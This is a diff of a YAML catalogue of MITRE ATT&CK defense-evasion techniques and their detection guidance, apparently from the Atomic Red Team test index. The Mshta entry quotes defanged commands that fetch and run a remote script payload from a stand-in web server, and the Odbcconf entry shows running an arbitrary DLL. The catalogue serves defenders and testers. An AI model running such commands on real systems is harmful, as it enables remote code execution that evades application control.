+ Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)
external_references:
- source_name: mitre-attack
external_id: T1036
@@ -26432,18 +27207,13 @@ defense-evasion:
url: https://twitter.com/ItsReallyNick/status/1055321652777619457
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
Retrieved April 22, 2019.
- description: |-
- Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
-
- Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)
- name: Masquerading
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--42e8de7b-37b2-4258-905a-6897815e58e0
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T20:26:01.837Z'
+ modified: '2020-07-09T13:54:28.727Z'
created: '2017-05-31T21:30:38.511Z'
x_mitre_platforms:
- Linux
@@ -26456,7 +27226,7 @@ defense-evasion:
Look for indications of common characters that may indicate an attempt to trick users into misidentifying the file type, such as a space as the last character of a file name or the right-to-left override characters"\u202E", "[U+202E]", and "%E2%80%AE”.
x_mitre_defense_bypassed:
- - Whitelisting by file name or path
+ - Application control by file name or path
x_mitre_data_sources:
- Process command-line parameters
- File monitoring
@@ -26467,7 +27237,7 @@ defense-evasion:
- Nick Carr, FireEye
- David Lu, Tripwire
- Felipe Espósito, @Pr0teus
- - ENDGAME
+ - Elastic
- Bartosz Jerzman
x_mitre_version: '1.3'
x_mitre_is_subtechnique: false
@@ -26502,25 +27272,25 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T20:23:00.913Z'
+ modified: '2020-06-20T22:11:45.970Z'
created: '2020-02-10T20:43:10.239Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_defense_bypassed:
+ - Application control by file name or path
+ x_mitre_detection: |-
+ Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
+
+ If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)
x_mitre_data_sources:
- File monitoring
- Process monitoring
- Process command-line parameters
- Binary file metadata
- x_mitre_detection: |-
- Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
-
- If file names are mismatched between the file name on disk and that of the binary's PE metadata, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries by looking to see if the InternalName, OriginalFilename, and/or ProductName match what is expected could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball) Do not focus on the possible names a file could have, but instead on the command-line arguments that are known to be used and are distinct because it will have a better rate of detection.(Citation: Twitter ItsReallyNick Masquerading Update)
- x_mitre_defense_bypassed:
- - Whitelisting by file name or path
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1556:
technique:
@@ -26547,7 +27317,8 @@ defense-evasion:
description: "Adversaries may modify authentication mechanisms and processes
to access user credentials or enable otherwise unwarranted access to accounts.
The authentication process is handled by mechanisms, such as the Local Security
- Authentication Server (LSASS) process and the Security Accounts Manager (SAM),
+ Authentication Server (LSASS) process and the Security Accounts Manager (SAM)
+ on Windows or pluggable authentication modules (PAM) on Unix-based systems,
responsible for gathering, storing, and validating credentials. \n\nAdversaries
may maliciously modify a part of this process to either reveal credentials
or bypass authentication mechanisms. Compromised credentials or access may
@@ -26562,12 +27333,15 @@ defense-evasion:
phase_name: credential-access
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-25T20:59:05.357Z'
+ modified: '2020-07-13T21:23:01.762Z'
created: '2020-02-11T19:01:56.887Z'
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Authentication logs
+ - API monitoring
+ - Windows Registry
+ - Process monitoring
+ - DLL monitoring
x_mitre_detection: "Monitor for new, unfamiliar DLL files written to a domain
controller and/or local computer. Monitor for changes to Registry entries
for password filters (ex: HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Notification
@@ -26577,23 +27351,72 @@ defense-evasion:
for calls to OpenProcess that can be used to manipulate lsass.exe
running on a domain controller as well as for malicious modifications to functions
exported from authentication-related system DLLs (such as cryptdll.dll and
- samsrv.dll).(Citation: Dell Skeleton) \n\nConfigure robust, consistent account
- activity audit policies across the enterprise and with externally accessible
- services. (Citation: TechNet Audit Policy) Look for suspicious account behavior
- across systems that share accounts, either user, admin, or service accounts.
- Examples: one account logged into multiple systems simultaneously; multiple
- accounts logged into the same machine simultaneously; accounts logged in at
- odd times or outside of business hours. Activity may be from interactive login
- sessions or process ownership from accounts being used to execute binaries
- on a remote system as a particular account. Correlate other security systems
- with login information (e.g., a user has an active login session but has not
- entered the building or does not have VPN access)."
+ samsrv.dll).(Citation: Dell Skeleton) \n\nMonitor PAM configuration and module
+ paths (ex: /etc/pam.d/) for changes. Use system-integrity tools
+ such as AIDE and monitoring tools such as auditd to monitor PAM files.\n\nConfigure
+ robust, consistent account activity audit policies across the enterprise and
+ with externally accessible services. (Citation: TechNet Audit Policy) Look
+ for suspicious account behavior across systems that share accounts, either
+ user, admin, or service accounts. Examples: one account logged into multiple
+ systems simultaneously; multiple accounts logged into the same machine simultaneously;
+ accounts logged in at odd times or outside of business hours. Activity may
+ be from interactive login sessions or process ownership from accounts being
+ used to execute binaries on a remote system as a particular account. Correlate
+ other security systems with login information (e.g., a user has an active
+ login session but has not entered the building or does not have VPN access)."
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ atomic_tests: []
+ T1578:
+ technique:
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1578
+ url: https://attack.mitre.org/techniques/T1578
+ - source_name: Mandiant M-Trends 2020
+ url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
+ description: FireEye / Mandiant. (2020, February). M-Trends 2020. Retrieved
+ April 24, 2020.
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Modify Cloud Compute Infrastructure
+ description: |-
+ An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.
+
+ Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)
+ id: attack-pattern--144e007b-e638-431d-a894-45d90c54ab90
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ modified: '2020-06-19T14:46:00.117Z'
+ created: '2019-08-30T18:03:05.864Z'
+ x_mitre_detection: Establish centralized logging for the activity of cloud compute
+ infrastructure components. Monitor for suspicious sequences of events, such
+ as the creation of multiple snapshots within a short period of time or the
+ mount of a snapshot to a new instance by a new or unexpected user. To reduce
+ false positives, valid change management procedures could introduce a known
+ identifier that is logged with the change (e.g., tag or header) if supported
+ by the cloud provider, to help distinguish valid, expected actions from malicious
+ ones.
x_mitre_data_sources:
- - Authentication logs
- - API monitoring
- - Windows Registry
- - Process monitoring
- - DLL monitoring
+ - Stackdriver logs
+ - GCP audit logs
+ - Azure activity logs
+ - AWS CloudTrail logs
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.0'
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - AWS
+ - GCP
+ - Azure
atomic_tests: []
T1112:
technique:
@@ -26650,32 +27473,32 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T22:52:55.930Z'
created: '2017-05-31T21:31:23.587Z'
- x_mitre_version: '1.1'
- x_mitre_contributors:
- - Bartosz Jerzman
- - Travis Smith, Tripwire
- - David Lu, Tripwire
- x_mitre_data_sources:
- - Windows Registry
- - File monitoring
- - Process monitoring
- - Process command-line parameters
- - Windows event logs
- x_mitre_defense_bypassed:
- - Host forensic analysis
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - SYSTEM
x_mitre_detection: |-
Modifications to the Registry are normal and occur throughout typical use of the Windows operating system. Consider enabling Registry Auditing on specific keys to produce an alertable event (Event ID 4657) whenever a value is changed (though this may not trigger when values are created with Reghide or other evasive methods). (Citation: Microsoft 4657 APR 2017) Changes to Registry entries that load software on Windows startup that do not correlate with known software, patch cycles, etc., are suspicious, as are additions or changes to files within the startup folder. Changes could also include new services and modification of existing binary paths to point to malicious files. If a change to a service-related entry occurs, then it will likely be followed by a local or remote service start or restart to execute the file.
Monitor processes and command-line arguments for actions that could be taken to change or delete information in the Registry. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), which may require additional logging features to be configured in the operating system to collect necessary information for analysis.
Monitor for processes, command-line arguments, and API calls associated with concealing Registry keys, such as Reghide. (Citation: Microsoft Reghide NOV 2006) Inspect and cleanup malicious hidden Registry entries using Native Windows API calls and/or tools such as Autoruns (Citation: SpectorOps Hiding Reg Jul 2017) and RegDelNull (Citation: Microsoft RegDelNull July 2016).
- x_mitre_permissions_required:
- - User
- - Administrator
- - SYSTEM
- x_mitre_platforms:
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ x_mitre_data_sources:
+ - Windows Registry
+ - File monitoring
+ - Process monitoring
+ - Process command-line parameters
+ - Windows event logs
+ x_mitre_contributors:
+ - Bartosz Jerzman
+ - Travis Smith, Tripwire
+ - David Lu, Tripwire
+ x_mitre_version: '1.1'
identifier: T1112
atomic_tests:
- name: Modify Registry of Current User Profile - cmd
@@ -26798,8 +27621,8 @@ defense-evasion:
but outside of the browser. (Citation: MSDN HTML Applications)\n\nFiles may
be executed by mshta.exe through an inline script: mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]//webserver/payload[.]sct\"\")\"))\n\nThey
may also be executed directly from URLs: mshta http[:]//webserver/payload[.]hta\n\nMshta.exe
- can be used to bypass application whitelisting solutions that do not account
- for its potential use. Since mshta.exe executes outside of the Internet Explorer's
+ can be used to bypass application control solutions that do not account for
+ its potential use. Since mshta.exe executes outside of the Internet Explorer's
security context, it also bypasses browser security settings. (Citation: LOLBAS
Mshta)"
name: Mshta
@@ -26845,28 +27668,28 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-27T21:13:44.990Z'
+ modified: '2020-06-20T22:35:27.613Z'
created: '2020-01-23T19:32:49.557Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_defense_bypassed:
- - Application whitelisting
- - Digital Certificate Validation
- x_mitre_detection: |-
- Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
-
- Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious
+ x_mitre_platforms:
+ - Windows
+ x_mitre_contributors:
+ - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
+ - Ricardo Dias
x_mitre_data_sources:
- File monitoring
- Process command-line parameters
- Process monitoring
- x_mitre_contributors:
- - Ye Yint Min Thu Htut, Offensive Security Team, DBS Bank
- - Ricardo Dias
- x_mitre_platforms:
- - Windows
+ x_mitre_detection: |-
+ Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed .hta files to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the .hta file being executed.
+
+ Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious
+ x_mitre_defense_bypassed:
+ - Application control
+ - Digital Certificate Validation
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1218.005
atomic_tests:
- name: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject
@@ -26929,11 +27752,17 @@ defense-evasion:
name: powershell
T1218.007:
technique:
+ created: '2020-01-24T14:38:49.266Z'
+ modified: '2020-06-20T22:38:14.154Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ type: attack-pattern
id: attack-pattern--365be77f-fc0e-42ee-bac8-4faf806d9336
description: |-
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe is digitally signed by Microsoft.
- Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application whitelisting solutions that do not account for its potential abuse.
+ Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse.
name: Msiexec
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
object_marking_refs:
@@ -26953,31 +27782,25 @@ defense-evasion:
url: https://blog.trendmicro.com/trendlabs-security-intelligence/attack-using-windows-installer-msiexec-exe-leads-lokibot/
description: Co, M. and Sison, G. (2018, February 8). Attack Using Windows
Installer msiexec.exe leads to LokiBot. Retrieved April 18, 2019.
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: defense-evasion
- modified: '2020-03-29T16:31:56.086Z'
- created: '2020-01-24T14:38:49.266Z'
- x_mitre_data_sources:
- - DLL monitoring
- - Process command-line parameters
- - Process monitoring
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
- - Application whitelisting
+ x_mitre_platforms:
+ - Windows
x_mitre_detection: Use process monitoring to monitor the execution and arguments
of msiexec.exe. Compare recent invocations of msiexec.exe with prior history
of known good arguments and executed MSI files or DLLs to determine anomalous
and potentially adversarial activity. Command arguments used before and after
the invocation of msiexec.exe may also be useful in determining the origin
and purpose of the MSI files or DLLs being executed.
- x_mitre_platforms:
- - Windows
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ - Application control
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - DLL monitoring
+ - Process command-line parameters
+ - Process monitoring
identifier: T1218.007
atomic_tests:
- name: Msiexec.exe - Execute Local MSI file
@@ -27104,29 +27927,29 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-03-29T22:46:56.308Z'
created: '2020-03-13T20:33:00.009Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Process command-line parameters
- - API monitoring
- - File monitoring
+ x_mitre_contributors:
+ - Oddvar Moe, @oddvarmoe
+ - Red Canary
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - NTFS partitioned hard drive
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Host forensic analysis
+ - Signature-based detection
x_mitre_detection: |-
Forensic techniques exist to identify information stored in NTFS EA. (Citation: Journey into IR ZeroAccess NTFS EA) Monitor calls to the ZwSetEaFile and ZwQueryEaFile Windows API functions as well as binaries used to interact with EA, (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) and consider regularly scanning for the presence of modified information. (Citation: SpectorOps Host-Based Jul 2017)
There are many ways to create and interact with ADSs using Windows utilities. Monitor for operations (execution, copies, etc.) with file names that contain colons. This syntax (ex: file.ext:ads[.ext]) is commonly associated with ADSs. (Citation: Microsoft ADS Mar 2014) (Citation: Oddvar Moe ADS1 Jan 2018) (Citation: Oddvar Moe ADS2 Apr 2018) For a more exhaustive list of utilities that can be used to execute and create ADSs, see https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f.
The Streams tool of Sysinternals can be used to uncover files with ADSs. The dir /r command can also be used to display ADSs. (Citation: Symantec ADS May 2009) Many PowerShell commands (such as Get-Item, Set-Item, Remove-Item, and Get-ChildItem) can also accept a -stream parameter to interact with ADSs. (Citation: MalwareBytes ADS July 2015) (Citation: Microsoft ADS Mar 2014)
- x_mitre_defense_bypassed:
- - Anti-virus
- - Host forensic analysis
- - Signature-based detection
- x_mitre_system_requirements:
- - NTFS partitioned hard drive
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Oddvar Moe, @oddvarmoe
- - Red Canary
+ x_mitre_data_sources:
+ - Process command-line parameters
+ - API monitoring
+ - File monitoring
+ x_mitre_platforms:
+ - Windows
identifier: T1564.004
atomic_tests:
- name: Alternate Data Streams (ADS)
@@ -27245,12 +28068,12 @@ defense-evasion:
'
name: powershell
- T1551.005:
+ T1070.005:
technique:
external_references:
- source_name: mitre-attack
- external_id: T1551.005
- url: https://attack.mitre.org/techniques/T1551/005
+ external_id: T1070.005
+ url: https://attack.mitre.org/techniques/T1070/005
- url: https://technet.microsoft.com/bb490717.aspx
description: Microsoft. (n.d.). Net Use. Retrieved November 25, 2016.
source_name: Technet Net Use
@@ -27272,13 +28095,16 @@ defense-evasion:
phase_name: defense-evasion
modified: '2020-01-31T12:39:18.816Z'
created: '2020-01-31T12:39:18.816Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - Authentication logs
- - Packet capture
- - Process command-line parameters
- - Process monitoring
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_system_requirements:
+ - Established network share connection to a remote system. Level of access depends
+ on permissions of the account used.
+ x_mitre_permissions_required:
+ - Administrator
+ - User
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
x_mitre_detection: Network share connections may be common depending on how
an network environment is used. Monitor command-line invocation of net
use commands associated with establishing and removing remote shares
@@ -27289,17 +28115,14 @@ defense-evasion:
determining when authenticated network shares are established and by which
account, and can be used to correlate network share activity to other events
to investigate potentially malicious activity.
- x_mitre_defense_bypassed:
- - Host forensic analysis
- x_mitre_permissions_required:
- - Administrator
- - User
- x_mitre_system_requirements:
- - Established network share connection to a remote system. Level of access depends
- on permissions of the account used.
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- identifier: T1551.005
+ x_mitre_data_sources:
+ - Authentication logs
+ - Packet capture
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Windows
+ identifier: T1070.005
atomic_tests:
- name: Add Network Share
auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131
@@ -27417,9 +28240,9 @@ defense-evasion:
Carbon Black Obfuscation Sept 2016)\n\nAdversaries may also obfuscate commands
executed from payloads or directly via a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059).
Environment variables, aliases, characters, and other platform/language specific
- semantics can be used to evade signature based detections and whitelisting
- mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation
- July 2017)(Citation: PaloAlto EncodedCommand March 2017) "
+ semantics can be used to evade signature based detections and application
+ control mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye
+ Revoke-Obfuscation July 2017)(Citation: PaloAlto EncodedCommand March 2017) "
name: Obfuscated Files or Information
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
id: attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a
@@ -27427,12 +28250,33 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T21:03:09.892Z'
+ modified: '2020-06-20T22:14:08.350Z'
created: '2017-05-31T21:30:32.662Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
+ x_mitre_contributors:
+ - Red Canary
+ - Christiaan Beek, @ChristiaanBeek
+ x_mitre_data_sources:
+ - Network protocol analysis
+ - Process use of network
+ - File monitoring
+ - Malware reverse engineering
+ - Binary file metadata
+ - Process command-line parameters
+ - Environment variable
+ - Process monitoring
+ - Windows event logs
+ - Network intrusion detection system
+ - Email gateway
+ - SSL/TLS inspection
+ x_mitre_defense_bypassed:
+ - Host forensic analysis
+ - Signature-based detection
+ - Host intrusion prevention systems
+ - Application control
+ - Log analysis
+ - Application control by file name or path
x_mitre_detection: "Detection of file obfuscation is difficult unless artifacts
are left behind by the obfuscation process that are uniquely detectable with
a signature. If detection of the obfuscation itself is not possible, it may
@@ -27458,32 +28302,10 @@ defense-evasion:
with an operation, assuming that individual events like an anti-virus detect
will not be investigated or that an analyst will not be able to conclusively
link that event to other activity occurring on the network. "
- x_mitre_defense_bypassed:
- - Host forensic analysis
- - Signature-based detection
- - Host intrusion prevention systems
- - Application whitelisting
- - Process whitelisting
- - Log analysis
- - Whitelisting by file name or path
- x_mitre_data_sources:
- - Network protocol analysis
- - Process use of network
- - File monitoring
- - Malware reverse engineering
- - Binary file metadata
- - Process command-line parameters
- - Environment variable
- - Process monitoring
- - Windows event logs
- - Network intrusion detection system
- - Email gateway
- - SSL/TLS inspection
- x_mitre_contributors:
- - Red Canary
- - Christiaan Beek, @ChristiaanBeek
- x_mitre_version: '1.1'
- x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1027
atomic_tests:
- name: Decode base64 Data into Script
@@ -27599,8 +28421,8 @@ defense-evasion:
payloads. Odbcconf.exe is a Windows utility that allows you to configure Open
Database Connectivity (ODBC) drivers and data source names.(Citation: Microsoft
odbcconf.exe) Odbcconf.exe is digitally signed by Microsoft.\n\nAdversaries
- may abuse odbcconf.exe to bypass application whitelisting solutions that do
- not account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010),
+ may abuse odbcconf.exe to bypass application control solutions that do not
+ account for its potential abuse. Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010),
odbcconf.exe has a REGSVR flag that can be misused to execute
DLLs (ex: odbcconf.exe /S /A {REGSVR \"C:\\Users\\Public\\file.dll\"}).
(Citation: LOLBAS Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation:
@@ -27634,27 +28456,27 @@ defense-evasion:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- modified: '2020-03-29T17:01:32.793Z'
+ modified: '2020-06-20T22:39:00.717Z'
created: '2020-01-24T15:01:32.917Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_permissions_required:
- - User
- x_mitre_defense_bypassed:
- - Digital Certificate Validation
- - Application whitelisting
+ x_mitre_platforms:
+ - Windows
+ x_mitre_data_sources:
+ - Loaded DLLs
+ - Process command-line parameters
+ - Process monitoring
x_mitre_detection: Use process monitoring to monitor the execution and arguments
of odbcconf.exe. Compare recent invocations of odbcconf.exe with prior history
of known good arguments and loaded DLLs to determine anomalous and potentially
adversarial activity. Command arguments used before and after the invocation
of odbcconf.exe may also be useful in determining the origin and purpose of
the DLL being loaded.
- x_mitre_data_sources:
- - Loaded DLLs
- - Process command-line parameters
- - Process monitoring
- x_mitre_platforms:
- - Windows
+ x_mitre_defense_bypassed:
+ - Digital Certificate Validation
+ - Application control
+ x_mitre_permissions_required:
+ - User
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
identifier: T1218.008
atomic_tests:
- name: Odbcconf.exe - Execute Arbitrary DLL
@@ -27708,10 +28530,10 @@ defense-evasion:
url: https://blog.xpnsec.com/becoming-system/
description: Chester, A. (2017, November 20). Alternative methods of becoming
SYSTEM. Retrieved June 4, 2019.
- - description: Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags.
- Retrieved June 4, 2019.
+ - source_name: Microsoft Process Creation Flags May 2018
url: https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags
- source_name: Microsoft Process Creation Flags May 2018
+ description: Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags.
+ Retrieved June 4, 2019.
- description: Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2)
Ataware Ransomware Part 3. Retrieved June 6, 2019.
url: https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3
@@ -27723,7 +28545,7 @@ defense-evasion:
description: |-
Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
- Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [VBScript](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
+ Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1086)/[Rundll32](https://attack.mitre.org/techniques/T1085) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)
id: attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a
@@ -27733,28 +28555,28 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
- modified: '2020-03-26T21:45:30.415Z'
+ modified: '2020-04-16T19:37:02.030Z'
created: '2020-02-18T18:22:41.448Z'
- x_mitre_platforms:
- - Windows
- x_mitre_data_sources:
- - API monitoring
- - Process monitoring
- - Windows event logs
+ x_mitre_contributors:
+ - Wayne Silva, F-Secure Countercept
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ x_mitre_defense_bypassed:
+ - Heuristic Detection
+ - Host forensic analysis
x_mitre_detection: |-
Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)
Monitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.
